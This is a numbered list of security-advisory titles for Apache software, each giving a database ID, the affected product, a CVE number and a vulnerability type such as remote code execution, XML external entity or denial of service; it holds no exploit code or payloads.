6302| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
6303| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
6304| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
6305| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
6306| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
6307| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
6308| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
6309| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
6310| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
6311| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
6312| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
6313| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
6314| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
6315| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
6316| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
6317| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
6318| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
6319| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
6320| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
6321| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
6322| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
6323| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
6324| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
6325| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
6326| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
6327| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
6328| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
6329| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
6330| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
6331| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
6332| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
6333| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
6334| [95675] Apache Struts Remote Code Execution Vulnerability
6335| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
6336| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
6337| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
6338| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
6339| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
6340| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
6341| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
6342| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
6343| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
6344| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
6345| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
6346| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
6347| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
6348| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
6349| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
6350| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
6351| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
6352| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
6353| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
6354| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
6355| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
6356| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
6357| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
6358| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
6359| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
6360| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
6361| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
6362| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
6363| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
6364| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
6365| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
6366| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
6367| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
6368| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
6369| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
6370| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
6371| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
6372| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
6373| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
6374| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
6375| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
6376| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
6377| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
6378| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
6379| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
6380| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
6381| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
6382| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
6383| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
6384| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
6385| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
6386| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
6387| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
6388| [91736] Apache XML-RPC Multiple Security Vulnerabilities
6389| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
6390| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
6391| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
6392| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
6393| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
6394| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
6395| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
6396| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
6397| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
6398| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
6399| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
6400| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
6401| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
6402| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
6403| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
6404| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
6405| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
6406| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
6407| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
6408| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
6409| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
6410| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
6411| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
6412| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
6413| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
6414| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
6415| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
6416| [90482] Apache CVE-2004-1387 Local Security Vulnerability
6417| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
6418| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
6419| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
6420| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
6421| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
6422| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
6423| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
6424| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
6425| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
6426| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
6427| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
6428| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
6429| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
6430| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
6431| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
6432| [86399] Apache CVE-2007-1743 Local Security Vulnerability
6433| [86397] Apache CVE-2007-1742 Local Security Vulnerability
6434| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
6435| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
6436| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
6437| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
6438| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
6439| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
6440| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
6441| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
6442| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
6443| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
6444| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
6445| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
6446| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
6447| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
6448| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
6449| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
6450| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
6451| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
6452| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
6453| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
6454| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
6455| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
6456| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
6457| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
6458| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
6459| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
6460| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
6461| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
6462| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
6463| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
6464| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
6465| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
6466| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
6467| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
6468| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
6469| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
6470| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
6471| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
6472| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
6473| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
6474| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
6475| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
6476| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
6477| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
6478| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
6479| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
6480| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
6481| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
6482| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
6483| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
6484| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
6485| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
6486| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
6487| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
6488| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
6489| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
6490| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
6491| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
6492| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
6493| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
6494| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
6495| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
6496| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
6497| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
6498| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
6499| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
6500| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
6501| [76933] Apache James Server Unspecified Command Execution Vulnerability
6502| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
6503| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
6504| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
6505| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
6506| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
6507| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
6508| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
6509| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
6510| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
6511| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
6512| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
6513| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
6514| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
6515| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
6516| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
6517| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
6518| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
6519| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
6520| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
6521| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
6522| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
6523| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
6524| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
6525| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
6526| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
6527| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
6528| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
6529| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
6530| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
6531| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
6532| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
6533| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
6534| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
6535| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
6536| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
6537| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
6538| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
6539| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
6540| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
6541| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
6542| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
6543| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
6544| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
6545| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
6546| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
6547| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
6548| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
6549| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
6550| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
6551| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
6552| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
6553| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
6554| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
6555| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
6556| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
6557| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
6558| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
6559| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
6560| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
6561| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
6562| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
6563| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
6564| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
6565| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
6566| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
6567| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
6568| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
6569| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
6570| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
6571| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
6572| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
6573| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
6574| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
6575| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
6576| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
6577| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
6578| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
6579| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
6580| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
6581| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
6582| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
6583| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
6584| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
6585| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
6586| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
6587| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
6588| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
6589| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
6590| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
6591| [68229] Apache Harmony PRNG Entropy Weakness
6592| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
6593| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
6594| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
6595| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
6596| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
6597| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
6598| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
6599| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
6600| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
6601| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
6602| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
6603| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
6604| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
6605| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
6606| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
6607| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
6608| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
6609| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
6610| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
6611| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
6612| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
6613| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
6614| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
6615| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
6616| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
6617| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
6618| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
6619| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
6620| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
6621| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
6622| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
6623| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
6624| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
6625| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
6626| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
6627| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
6628| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
6629| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
6630| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
6631| [64780] Apache CloudStack Unauthorized Access Vulnerability
6632| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
6633| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
6634| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
6635| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
6636| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
6637| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
6638| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
6639| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
6640| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
6641| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
6642| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
6643| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
6644| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
6645| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
6646| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
6647| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
6648| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
6649| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
6650| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
6651| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
6652| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
6653| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
6654| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
6655| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
6656| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
6657| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
6658| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
6659| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
6660| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
6661| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
6662| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
6663| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
6664| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
6665| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
6666| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
6667| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
6668| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
6669| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
